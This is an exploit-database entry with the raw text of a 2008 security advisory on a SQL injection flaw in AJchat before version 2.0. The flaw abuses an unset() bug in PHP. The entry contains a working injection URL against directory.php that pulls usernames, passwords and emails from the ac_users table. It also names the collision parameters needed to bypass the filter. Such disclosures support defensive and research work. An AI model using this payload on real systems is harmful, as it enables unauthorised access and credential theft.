header-logo
Suggest Exploit
vendor:
AJchat
by:
Eugene Minaev
9.3
CVSS
HIGH
AJchat Remote Sql Injection
89
CWE
Product Name: AJchat
Affected Version From: Prior to 2.0
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: cpe:a:ajchat:ajchat
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

AJchat Remote Sql Injection using unset() bug

AJchat is vulnerable to a remote SQL injection attack due to an unset() bug. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. This vulnerability affects AJchat versions prior to 2.0.

Mitigation:

Upgrade to AJchat version 2.0 or later.
Source

Exploit-DB raw data:

----[ AJchat Remote Sql Injection using unset() bug ... ITDefence.ru Antichat.ru ]

							AJchat Remote Sql Injection using unset() bug
							Eugene Minaev underwater@itdefence.ru 
				___________________________________________________________________
			____/  __ __ _______________________ _______  _______________    \  \   \
			/ .\  /  /_// //              /        \       \/      __       \   /__/   /
			/ /     /_//              /\        /       /      /         /     /___/
			\/        /              / /       /       /\     /         /         /
			/        /               \/       /       / /    /         /__       //\
			\       /    ____________/       /        \/    __________// /__    // /   
			/\\      \_______/        \________________/____/  2007    /_//_/   // //\
			\ \\                                                               // // /
			.\ \\        -[     ITDEFENCE.ru Security advisory     ]-         // // / . 
			. \_\\________[________________________________________]_________//_//_/ . .
			
		<?php
		if (isset($_GET["s"])){
		$_GET["s"] = strtoupper($_GET["s"]);
		if (strlen($_GET["s"])==1 && $_GET["s"]>='A' && $_GET["s"]<='Z'){
		// nothing
		}else unset($_GET['s']);
		} 
		?>
		
		As we can see , $_GET['s'] can include only A..Z characters , in other way script unset() it.
		
		calc.exe s
		5861526=1
		5863704=1
		
		directory.php?s='and 1 = 2 union select concat_ws(char(59),id,username,password,email),null+from+ac_users/*&5861526=1&5863704=1

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

# milw0rm.com [2008-01-11]

Navigation

Suggest Exploit

Services By CQR